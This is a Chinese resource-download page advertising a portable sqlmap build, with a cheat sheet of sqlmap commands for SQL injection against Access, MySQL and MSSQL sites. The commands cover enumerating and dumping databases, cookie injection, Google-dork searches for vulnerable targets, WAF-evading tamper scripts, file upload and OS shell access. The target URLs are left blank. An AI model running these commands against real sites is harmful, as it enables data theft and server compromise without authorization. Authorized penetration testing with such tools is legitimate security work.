最新公告
  • 欢迎您光临源码窝,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 正文概述
  • 评价建议
  • sqlmap是一个开源的渗透测试工具,利用数据库注入漏洞获取网站的信息和相应的权限。世界上最牛逼的黑客都在用这款小巧精悍的渗透利器。下面整理出来sqlmap的命令大全分析给大家,文章结尾附上SqlMap免Python环境的下载。

    access数据库注入
    sqlmap.py -u ""
    sqlmap.py -u "" --tables    参数:列表名
    sqlmap.py -u "" --columns -T ""        参数:列字段
    sqlmap.py -u "" --dump -C "" -T ""    参数:下载数据

    MySQL数据库注入

    sqlmap.py -u ""
    sqlmap.py -u "" --is-dba 当前用户权限
    sqlmap.py -u "" --dbs 所有数据库
    sqlmap.py -u "" --current-db 网站当前数据库
    sqlmap.py -u "" --users 所有数据库用户
    sqlmap.py -u "" --current-user 当前数据库用户
    sqlmap.py -u "" --tables -D ""
    sqlmap.py -u "" --columns -T "" -D ""
    sqlmap.py -u "" --dump -C "" -T "" -D ""

    MsSQL数据库注入

    sqlmap.py -u ""
    sqlmap.py -u "" --is-dba    当前用户权限
    sqlmap.py -u "" --dbs        所有数据库
    sqlmap.py -u "" --users    所有数据库用户
    sqlmap.py -u "" --current-db    网站当前数据库
    sqlmap.py -u "" --current-user    当前数据库用户
    sqlmap.py -u "" --tables -D ""
    sqlmap.py -u "" --columns -T "" -D ""
    sqlmap.py -u "" --dump -C "" -T "" -D ""(sqlmap.py -u "" --dump -T "" -D "")

    Cookie中转注入

    sqlmap.py -u ""
    sqlmap.py -u "" --cookie "id=?" --level ?
    sqlmap.py -u "" --cookie "id=?" --level ? --tables
    sqlmap.py -u "" --cookie "id=?" --level ? --columns -T ""
    sqlmap.py -u "" --cookie "id=?" --level ? --dump -C "" -T ""

    利用google批量搜索注入

    sqlmap.py -g "" 谷歌关键字搜索

    搜索引擎语法:

    inurl:
    intext:
    intitle:
    site:

    tamper插件使用

    sqlmap.py -u ""
    sqlmap.py -u "" -v 3 --batch -- tamper ""  
    sqlmap.py -u "" --check-waf --tamper ""

    file参数使用(必须是dba)

    sqlmap.py -u "" 
    sqlmap.py -u "" --is-dba  当前用户权限
    sqlmap.py -u "" --file-write=D:/需上传的文件名 --file-dest=硬盘:/文件夹/.../需上传的文件列名

    post提交方式注入

    sqlmap.py -u "" --forms
    sqlmap.py -r "" 文本文档名

    OS参数

    sqlmap.py -u "" --os-cmd= (推荐win)
    sqlmap.py -u "" --os-shell (exit)
    RIPRO主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
    源码窝 » SqlMap免Python环境绿色版下载附sqlmap命令大全

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    源码窝
    提供全网最新资源,如有侵权联系删除

    发表评论

    售后服务:

    • 售后服务范围 1、商业模板使用范围内问题免费咨询
      2、源码安装、模板安装(一般 ¥50-300)服务答疑仅限SVIP用户
      3、单价超过200元的模板免费一次安装,需提供服务器信息。
      付费增值服务 1、提供dedecms模板、WordPress主题、discuz模板优化等服务请详询在线客服
      2、承接 WordPress、DedeCMS、Discuz 等系统建站、仿站、开发、定制等服务
      3、服务器环境配置(一般 ¥50-300)
      4、网站中毒处理(需额外付费,500元/次/质保三个月)
      售后服务时间 周一至周日(法定节假日除外) 9:00-23:00
      免责声明 本站所提供的模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: 80027422@qq.com),我们会及时删除,给您带来的不便,我们深表歉意!

    Hi, 如果你对这款模板有疑问,可以跟我联系哦!

    联系作者
    • 28会员总数(位)
    • 593资源总数(个)
    • 0本周发布(个)
    • 0 今日发布(个)
    • 209稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情